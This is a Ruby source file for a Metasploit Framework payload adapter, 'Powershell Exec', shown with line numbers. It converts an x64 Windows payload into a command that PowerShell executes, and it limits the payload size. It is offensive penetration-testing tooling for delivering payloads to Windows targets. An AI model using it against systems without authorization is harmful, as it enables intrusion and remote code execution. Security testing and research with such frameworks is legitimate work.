Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
module MetasploitModule
7
  include Msf::Payload::Adapter
8
  include Msf::Exploit::Powershell
9

10
  def initialize(info = {})
11
    super(
12
      update_info(
13
        info,
14
        'Name' => 'Powershell Exec',
15
        'Description' => 'Execute an x64 payload from a command via PowerShell',
16
        'Author' => 'Spencer McIntyre',
17
        'Platform' => 'win',
18
        'Arch' => ARCH_CMD,
19
        'License' => MSF_LICENSE,
20
        'AdaptedArch' => ARCH_X64,
21
        'AdaptedPlatform' => 'win',
22
        'RequiredCmd' => 'powershell'
23
      )
24
    )
25
  end
26

27
  def compatible?(mod)
28
    # size is not unlimited due to the standard command length limit, the final size depends on the options that are
29
    # configured but 3,000 is in a good range (can go up to 4,000 with default settings at this time)
30
    if mod.type == Msf::MODULE_PAYLOAD && (mod.class.const_defined?(:CachedSize) && mod.class::CachedSize != :dynamic) && (mod.class::CachedSize >= 3_000)
31
      return false
32
    end
33

34
    super
35
  end
36

37
  def generate(opts = {})
38
    opts[:arch] ||= module_info['AdaptedArch']
39
    payload = super
40

41
    cmd_psh_payload(payload, ARCH_X64, remove_comspec: true)
42
  end
43

44
  def generate_stage(opts = {})
45
    opts[:arch] ||= module_info['AdaptedArch']
46
    super
47
  end
48

49
  def generate_payload_uuid(conf = {})
50
    conf[:arch] ||= module_info['AdaptedArch']
51
    conf[:platform] ||= module_info['AdaptedPlatform']
52
    super
53
  end
54

55
  def handle_connection(conn, opts = {})
56
    opts[:arch] ||= module_info['AdaptedArch']
57
    super
58
  end
59
end
60

61